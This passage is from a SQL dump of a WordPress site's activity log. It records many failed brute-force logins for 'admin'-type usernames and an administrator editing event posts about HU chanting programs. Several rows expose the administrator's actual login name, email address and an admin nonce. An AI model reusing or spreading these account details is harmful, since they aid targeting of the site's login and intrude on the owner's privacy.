0.169.51.x'),(230880,39052,'failed_username','admin'),(230881,39052,'server_http_user_agent','Mozilla/5.0'),(230882,39052,'_message_key','user_unknown_login_failed'),(230883,39052,'_server_remote_addr','45.136.118.x'),(230884,39053,'failed_username','admin'),(230885,39053,'server_http_user_agent','Mozilla/5.0'),(230886,39053,'_message_key','user_unknown_login_failed'),(230887,39053,'_server_remote_addr','20.169.51.x'),(230888,39054,'failed_username','admin'),(230889,39054,'server_http_user_agent','Mozilla/5.0'),(230890,39054,'_message_key','user_unknown_login_failed'),(230891,39054,'_server_remote_addr','45.136.118.x'),(230892,39055,'failed_username','admin'),(230893,39055,'server_http_user_agent','Mozilla/5.0'),(230894,39055,'_message_key','user_unknown_login_failed'),(230895,39055,'_server_remote_addr','20.169.51.x'),(230896,39056,'failed_username','admin'),(230897,39056,'server_http_user_agent','Mozilla/5.0'),(230898,39056,'_message_key','user_unknown_login_failed'),(230899,39056,'_server_remote_addr','45.136.118.x'),(230900,39057,'failed_username','admin'),(230901,39057,'server_http_user_agent','Mozilla/5.0'),(230902,39057,'_message_key','user_unknown_login_failed'),(230903,39057,'_server_remote_addr','20.169.51.x'),(230904,39058,'failed_username','admin'),(230905,39058,'server_http_user_agent','Mozilla/5.0'),(230906,39058,'_message_key','user_unknown_login_failed'),(230907,39058,'_server_remote_addr','45.136.118.x'),(230908,39059,'failed_username','admin'),(230909,39059,'server_http_user_agent','Mozilla/5.0'),(230910,39059,'_message_key','user_unknown_login_failed'),(230911,39059,'_server_remote_addr','20.169.51.x'),(230912,39060,'failed_username','admin'),(230913,39060,'server_http_user_agent','Mozilla/5.0'),(230914,39060,'_message_key','user_unknown_login_failed'),(230915,39060,'_server_remote_addr','45.136.118.x'),(230916,39061,'failed_username','admin'),(230917,39061,'server_http_user_agent','Mozilla/5.0'),(230918,39061,'_message_key','user_unknown_login_failed'),(230919,39061,'_server_remote_addr','20.169.51.x'),(230920,39062,'failed_username','admin'),(230921,39062,'server_http_user_agent','Mozilla/5.0'),(230922,39062,'_message_key','user_unknown_login_failed'),(230923,39062,'_server_remote_addr','45.136.118.x'),(230924,39063,'failed_username','admin'),(230925,39063,'server_http_user_agent','Mozilla/5.0'),(230926,39063,'_message_key','user_unknown_login_failed'),(230927,39063,'_server_remote_addr','20.169.51.x'),(230928,39064,'failed_username','admin'),(230929,39064,'server_http_user_agent','Mozilla/5.0'),(230930,39064,'_message_key','user_unknown_login_failed'),(230931,39064,'_server_remote_addr','45.136.118.x'),(230932,39065,'failed_username','admin'),(230933,39065,'server_http_user_agent','Mozilla/5.0'),(230934,39065,'_message_key','user_unknown_login_failed'),(230935,39065,'_server_remote_addr','20.169.51.x'),(230936,39066,'failed_username','admin'),(230937,39066,'server_http_user_agent','Mozilla/5.0'),(230938,39066,'_message_key','user_unknown_login_failed'),(230939,39066,'_server_remote_addr','45.136.118.x'),(230940,39067,'failed_username','admin'),(230941,39067,'server_http_user_agent','Mozilla/5.0'),(230942,39067,'_message_key','user_unknown_login_failed'),(230943,39067,'_server_remote_addr','20.169.51.x'),(230944,39068,'failed_username','admin'),(230945,39068,'server_http_user_agent','Mozilla/5.0'),(230946,39068,'_message_key','user_unknown_login_failed'),(230947,39068,'_server_remote_addr','45.136.118.x'),(230948,39069,'failed_username','admin'),(230949,39069,'server_http_user_agent','Mozilla/5.0'),(230950,39069,'_message_key','user_unknown_login_failed'),(230951,39069,'_server_remote_addr','20.169.51.x'),(230952,39070,'failed_username','admin'),(230953,39070,'server_http_user_agent','Mozilla/5.0'),(230954,39070,'_message_key','user_unknown_login_failed'),(230955,39070,'_server_remote_addr','45.136.118.x'),(230956,39071,'failed_username','admin'),(230957,39071,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(230958,39071,'_message_key','user_unknown_login_failed'),(230959,39071,'_xmlrpc_request','true'),(230960,39071,'_server_remote_addr','157.245.200.x'),(230961,39072,'failed_username','admin'),(230962,39072,'server_http_user_agent','Mozilla/5.0'),(230963,39072,'_message_key','user_unknown_login_failed'),(230964,39072,'_server_remote_addr','20.169.51.x'),(230965,39073,'failed_username','administrator'),(230966,39073,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(230967,39073,'_message_key','user_unknown_login_failed'),(230968,39073,'_server_remote_addr','107.189.28.x'),(230969,39074,'failed_username','admin'),(230970,39074,'server_http_user_agent','Mozilla/5.0'),(230971,39074,'_message_key','user_unknown_login_failed'),(230972,39074,'_server_remote_addr','45.136.118.x'),(230973,39075,'failed_username','admin'),(230974,39075,'server_http_user_agent','Mozilla/5.0'),(230975,39075,'_message_key','user_unknown_login_failed'),(230976,39075,'_server_remote_addr','20.169.51.x'),(230977,39076,'failed_username','admin'),(230978,39076,'server_http_user_agent','Mozilla/5.0'),(230979,39076,'_message_key','user_unknown_login_failed'),(230980,39076,'_server_remote_addr','45.136.118.x'),(230981,39077,'failed_username','admin'),(230982,39077,'server_http_user_agent','Mozilla/5.0'),(230983,39077,'_message_key','user_unknown_login_failed'),(230984,39077,'_server_remote_addr','20.169.51.x'),(230985,39078,'failed_username','admin'),(230986,39078,'server_http_user_agent','Mozilla/5.0'),(230987,39078,'_message_key','user_unknown_login_failed'),(230988,39078,'_server_remote_addr','45.136.118.x'),(230989,39079,'failed_username','admin'),(230990,39079,'server_http_user_agent','Mozilla/5.0'),(230991,39079,'_message_key','user_unknown_login_failed'),(230992,39079,'_server_remote_addr','20.169.51.x'),(230993,39080,'failed_username','admin'),(230994,39080,'server_http_user_agent','Mozilla/5.0'),(230995,39080,'_message_key','user_unknown_login_failed'),(230996,39080,'_server_remote_addr','45.136.118.x'),(230997,39081,'failed_username','admin'),(230998,39081,'server_http_user_agent','Mozilla/5.0'),(230999,39081,'_message_key','user_unknown_login_failed'),(231000,39081,'_server_remote_addr','20.169.51.x'),(231001,39082,'failed_username','admin'),(231002,39082,'server_http_user_agent','Mozilla/5.0'),(231003,39082,'_message_key','user_unknown_login_failed'),(231004,39082,'_server_remote_addr','45.136.118.x'),(231005,39083,'failed_username','admin'),(231006,39083,'server_http_user_agent','Mozilla/5.0'),(231007,39083,'_message_key','user_unknown_login_failed'),(231008,39083,'_server_remote_addr','20.169.51.x'),(231009,39084,'failed_username','admin'),(231010,39084,'server_http_user_agent','Mozilla/5.0'),(231011,39084,'_message_key','user_unknown_login_failed'),(231012,39084,'_server_remote_addr','45.136.118.x'),(231013,39085,'failed_username','admin'),(231014,39085,'server_http_user_agent','Mozilla/5.0'),(231015,39085,'_message_key','user_unknown_login_failed'),(231016,39085,'_server_remote_addr','20.169.51.x'),(231017,39086,'failed_username','admin'),(231018,39086,'server_http_user_agent','Mozilla/5.0'),(231019,39086,'_message_key','user_unknown_login_failed'),(231020,39086,'_server_remote_addr','45.136.118.x'),(231021,39087,'failed_username','admin'),(231022,39087,'server_http_user_agent','Mozilla/5.0'),(231023,39087,'_message_key','user_unknown_login_failed'),(231024,39087,'_server_remote_addr','20.169.51.x'),(231025,39088,'failed_username','admin'),(231026,39088,'server_http_user_agent','Mozilla/5.0'),(231027,39088,'_message_key','user_unknown_login_failed'),(231028,39088,'_server_remote_addr','45.136.118.x'),(231029,39089,'failed_username','admin'),(231030,39089,'server_http_user_agent','Mozilla/5.0'),(231031,39089,'_message_key','user_unknown_login_failed'),(231032,39089,'_server_remote_addr','20.169.51.x'),(231033,39090,'failed_username','admin'),(231034,39090,'server_http_user_agent','Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(231035,39090,'_message_key','user_unknown_login_failed'),(231036,39090,'_server_remote_addr','205.185.124.x'),(231037,39091,'failed_username','admin'),(231038,39091,'server_http_user_agent','Mozilla/5.0'),(231039,39091,'_message_key','user_unknown_login_failed'),(231040,39091,'_server_remote_addr','45.136.118.x'),(231041,39092,'failed_username','admin'),(231042,39092,'server_http_user_agent','Mozilla/5.0'),(231043,39092,'_message_key','user_unknown_login_failed'),(231044,39092,'_server_remote_addr','20.169.51.x'),(231045,39093,'failed_username','admin'),(231046,39093,'server_http_user_agent','Mozilla/5.0'),(231047,39093,'_message_key','user_unknown_login_failed'),(231048,39093,'_server_remote_addr','45.136.118.x'),(231049,39094,'failed_username','admin'),(231050,39094,'server_http_user_agent','Mozilla/5.0'),(231051,39094,'_message_key','user_unknown_login_failed'),(231052,39094,'_server_remote_addr','20.169.51.x'),(231053,39095,'failed_username','admin'),(231054,39095,'server_http_user_agent','Mozilla/5.0'),(231055,39095,'_message_key','user_unknown_login_failed'),(231056,39095,'_server_remote_addr','45.136.118.x'),(231057,39096,'failed_username','admin'),(231058,39096,'server_http_user_agent','Mozilla/5.0'),(231059,39096,'_message_key','user_unknown_login_failed'),(231060,39096,'_server_remote_addr','20.169.51.x'),(231061,39097,'failed_username','admin'),(231062,39097,'server_http_user_agent','Mozilla/5.0'),(231063,39097,'_message_key','user_unknown_login_failed'),(231064,39097,'_server_remote_addr','45.136.118.x'),(231065,39098,'failed_username','admin'),(231066,39098,'server_http_user_agent','Mozilla/5.0'),(231067,39098,'_message_key','user_unknown_login_failed'),(231068,39098,'_server_remote_addr','20.169.51.x'),(231069,39099,'failed_username','admin'),(231070,39099,'server_http_user_agent','Mozilla/5.0'),(231071,39099,'_message_key','user_unknown_login_failed'),(231072,39099,'_server_remote_addr','45.136.118.x'),(231073,39100,'failed_username','admin'),(231074,39100,'server_http_user_agent','Mozilla/5.0'),(231075,39100,'_message_key','user_unknown_login_failed'),(231076,39100,'_server_remote_addr','20.169.51.x'),(231077,39101,'failed_username','admin'),(231078,39101,'server_http_user_agent','Mozilla/5.0'),(240036,40857,'post_new_post_date','2023-11-02 09:41:46'),(240037,40857,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(240033,40857,'post_prev_post_status','draft'),(240034,40857,'post_new_post_status','publish'),(240035,40857,'post_prev_post_date','2023-11-02 09:35:33'),(240104,40868,'new_post_id','269324'),(240103,40868,'new_post_title','SOUND OF SOUL - COLORADO SPRINGS IN PERSON TEMPLATE | Benefit Title Goes Here'),(240038,40857,'post_new_post_date_gmt','2023-11-02 15:41:46'),(240039,40857,'post_prev_thumb_id','265138'),(240040,40857,'post_prev_thumb_title','rountable-notext-2021'),(240041,40857,'post_new_thumb_id','268755'),(240042,40857,'post_new_thumb_title','ancient-ruins-2'),(240043,40857,'_message_key','post_updated'),(240044,40857,'_user_id','2'),(240045,40857,'_user_login','S8zhaBda'),(240046,40857,'_user_email','nada@zipnadanot.org'),(240047,40857,'_server_remote_addr','76.130.120.x'),(240048,40857,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269323'),(240049,40858,'failed_username','optimaadmin'),(240050,40858,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(240051,40858,'_message_key','user_unknown_login_failed'),(240052,40858,'_xmlrpc_request','true'),(240053,40858,'_server_remote_addr','52.188.195.x'),(240054,40859,'failed_username','admin'),(240055,40859,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(240056,40859,'_message_key','user_unknown_login_failed'),(240057,40859,'_xmlrpc_request','true'),(240058,40859,'_server_remote_addr','20.163.28.x'),(240059,40860,'failed_username','admin'),(240060,40860,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(240061,40860,'_message_key','user_unknown_login_failed'),(240062,40860,'_server_remote_addr','82.157.16.x'),(240063,40861,'failed_username','admin'),(240064,40861,'server_http_user_agent','Mozilla/5.0'),(240065,40861,'_message_key','user_unknown_login_failed'),(240066,40861,'_server_remote_addr','13.95.232.x'),(240067,40862,'plugin_name','Advanced Google reCAPTCHA'),(240068,40862,'plugin_current_version','1.0.15'),(240069,40862,'plugin_new_version','1.12'),(240070,40862,'_message_key','plugin_update_available'),(240071,40862,'_server_remote_addr','173.231.231.x'),(240072,40863,'failed_username','admin'),(240073,40863,'server_http_user_agent','Mozilla/5.0'),(240074,40863,'_message_key','user_unknown_login_failed'),(240075,40863,'_server_remote_addr','13.95.232.x'),(240076,40864,'failed_username','admin'),(240077,40864,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(240078,40864,'_message_key','user_unknown_login_failed'),(240079,40864,'_server_remote_addr','51.91.151.x'),(240080,40865,'failed_username','admin'),(240081,40865,'server_http_user_agent','Mozilla/5.0'),(240082,40865,'_message_key','user_unknown_login_failed'),(240083,40865,'_server_remote_addr','13.95.232.x'),(240084,40866,'user_id','2'),(240085,40866,'user_email','nada@zipnadanot.org'),(240086,40866,'user_login','S8zhaBda'),(240087,40866,'_user_id','2'),(240088,40866,'_user_login','S8zhaBda'),(240089,40866,'_user_email','nada@zipnadanot.org'),(240090,40866,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(240091,40866,'_message_key','user_logged_in'),(240092,40866,'_server_remote_addr','76.130.120.x'),(240093,40866,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(240094,40867,'post_id','269324'),(240095,40867,'post_type','mec-events'),(240096,40867,'post_title','SOUND OF SOUL &#8211; COLORADO SPRINGS IN PERSON TEMPLATE | Benefit Title Goes Here'),(240097,40867,'_message_key','post_updated'),(240098,40867,'_user_id','2'),(240099,40867,'_user_login','S8zhaBda'),(240100,40867,'_user_email','nada@zipnadanot.org'),(240101,40867,'_server_remote_addr','76.130.120.x'),(240102,40867,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=76fbdd1019&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(240144,40871,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, A Natural Way to Connect with Spirit.<br>\r\n</span></strong></span><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Here are some of the many benefits of HU:</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(240113,40869,'post_id','269324'),(240114,40869,'post_type','mec-events'),(240115,40869,'post_title','Tune Into the God Force'),(240116,40869,'post_meta_added','78'),(240117,40869,'_message_key','post_updated'),(240118,40869,'_user_id','2'),(240119,40869,'_user_login','S8zhaBda'),(240120,40869,'_user_email','nada@zipnadanot.org'),(240121,40869,'_server_remote_addr','76.130.120.x'),(240122,40869,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269324'),(240123,40870,'post_type','attachment'),(240124,40870,'attachment_id','269325'),(240125,40870,'attachment_title','hu-sos-golden-2'),(240126,40870,'attachment_filename','hu-sos-golden-2.jpg'),(240127,40870,'attachment_mime','image/jpeg'),(240128,40870,'attachment_filesize','71272'),(240129,40870,'attachment_parent_id','269324'),(240130,40870,'attachment_parent_title','Tune Into the God Force'),(240131,40870,'attachment_parent_post_type','mec-events'),(240132,40870,'_message_key','attachment_created'),(240133,40870,'_user_id','2'),(240134,40870,'_user_login','S8zhaBda'),(240135,40870,'_user_email','nada@zipnadanot.org'),(240136,40870,'_server_remote_addr','76.130.120.x'),(240137,40870,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269324'),(240138,40871,'post_id','269324'),(240139,40871,'post_type','mec-events'),(240140,40871,'post_title','Tune Into the God Force'),(240141,40871,'post_prev_post_name',''),(240142,40871,'post_new_post_name','tune-into-the-god-force'),(240143,40871,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, A Natural Way to Connect with Spirit.<br>\n</span></strong></span><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Here are some of the many benefits of HU:</span></strong></p>\n<ul class=\"\">\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\n</ul>\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.<br>\n</span></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(240105,40868,'duplicated_post_title','SOUND OF SOUL - COLORADO SPRINGS IN PERSON TEMPLATE | Benefit Title Goes Here'),(240106,40868,'duplicated_post_id','268251'),(240107,40868,'_message_key','post_duplicated'),(240108,40868,'_user_id','2'),(240109,40868,'_user_login','S8zhaBda'),(240110,40868,'_user_email','nada@zipnadanot.org'),(240111,40868,'_server_remote_addr','76.130.120.x'),(240112,40868,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=76fbdd1019&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(240145,40871,'post_prev_post_status','draft'),(240146,40871,'post_new_post_status','publish'),(240147,40871,'post_prev_post_date','2023-11-02 14:19:30'),(240148,40871,'post_new_post_date','2023-11-02 14:28:55'),(240149,40871,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(240150,40871,'post_new_post_date_gmt','2023-11-02 20:28:55'),(240151,40871,'post_new_thumb_id','269325'),(240152,40871,'post_new_thumb_title','hu-sos-golden-2'),(240153,40871,'_message_key','post_updated'),(240154,40871,'_user_id','2'),(240155,40871,'_user_login','S8zhaBda'),(240156,40871,'_user_email','nada@zipnadanot.org'),(240157,40871,'_server_remote_addr','76.130.120.x'),(240158,40871,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269324'),(240159,40872,'post_id','269324'),(240160,40872,'post_type','mec-events'),(240161,40872,'post_title','Tune Into the God Force'),(240162,40872,'post_prev_thumb_id','269325'),(240163,40872,'post_prev_thumb_title','hu-sos-golden-2'),(240164,40872,'post_new_thumb_id','268857'),(240165,40872,'post_new_thumb_title','balance-4'),(240166,40872,'_message_key','post_updated'),(240167,40872,'_user_id','2'),(240168,40872,'_user_login','S8zhaBda'),(240169,40872,'_user_email','nada@zipnadanot.org'),(240170,40872,'_server_remote_addr','76.130.120.x'),(240171,40872,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269324&action=edit'),(240172,40873,'post_id','269326'),(240173,40873,'post_type','mec-events'),(240174,40873,'post_title','ELSS LIVE STREAMING for COLORADO SPRINGS TEMPLATE | Benefit Title goes here'),(240175,40873,'_message_key','post_updated'),(240176,40873,'_user_id','2'),(240177,40873,'_user_login','S8zhaBda'),(240178,40873,'_user_email','nada@zipnadanot.org'),(240179,40873,'_server_remote_addr','76.130.120.x'),(240180,40873,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=76fbdd1019&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(240181,40874,'new_post_title','ELSS LIVE STREAMING for COLORADO SPRINGS TEMPLATE | Benefit Title goes here'),(240182,40874,'new_post_id','269326'),(240183,40874,'duplicated_post_title','ELSS LIVE STREAMING for COLORADO SPRINGS TEMPLATE | Benefit Title goes here'),(240184,40874,'duplicated_post_id','268843'),(240185,40874,'_message_key','post_duplicated'),(240186,40874,'_user_id','2'),(240187,40874,'_user_login','S8zhaBda'),(240188,40874,'_user_email','nada@zipnadanot.org'),(240189,40874,'_server_remote_addr','76.130.120.x'),(240190,40874,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=76fbdd1019&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(240191,40875,'post_id','269326'),(240192,40875,'post_type','mec-events'),(240193,40875,'post_title','Our Spiritual Wake-up Calls'),(240194,40875,'post_new_thumb_id','266063'),(240195,40875,'post_new_thumb_title','sunset-lightshine'),(240196,40875,'post_meta_added','79'),(240197,40875,'_message_key','post_updated'),(240198,40875,'_user_id','2'),(240199,40875,'_user_login','S8zhaBda'),(240200,40875,'_user_email','nada@zipnadanot.org'),(240201,40875,'_server_remote_addr','76.130.120.x'),(240202,40875,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269326'),(240203,40876,'post_type','attachment'),(240204,40876,'attachment_id','269327'),(240205,40876,'attachment_title','skylight-1tree'),(240206,40876,'attachment_filename','skylight-1tree.jpg'),(240207,40876,'attachment_mime','image/jpeg'),(240208,40876,'attachment_filesize','72938'),(240209,40876,'attachment_parent_id','269326'),(240210,40876,'attachment_parent_title','Our Spiritual Wake-up Calls'),(240211,40876,'attachment_parent_post_type','mec-events'),(240212,40876,'_message_key','attachment_created'),(240213,40876,'_user_id','2'),(240214,40876,'_user_login','S8zhaBda'),(240215,40876,'_user_email','nada@zipnadanot.org'),(240216,40876,'_server_remote_addr','76.130.120.x'),(240217,40876,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269326'),(240218,40877,'post_id','269326'),(240219,40877,'post_type','mec-events'),(240220,40877,'post_title','Our Spiritual Wake-up Calls'),(240221,40877,'post_prev_post_name',''),(240222,40877,'post_new_post_name','our-spiritual-wake-up-calls-2'),(240223,40877,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><span style=\"font-size: 15pt;\">The <strong>Colorado Springs ECK Center</strong> will be live-streaming the upcoming \'ECK Light and Sound Service\' from the ECK Temple of Colorado. The program will be shown on a large TV for all to 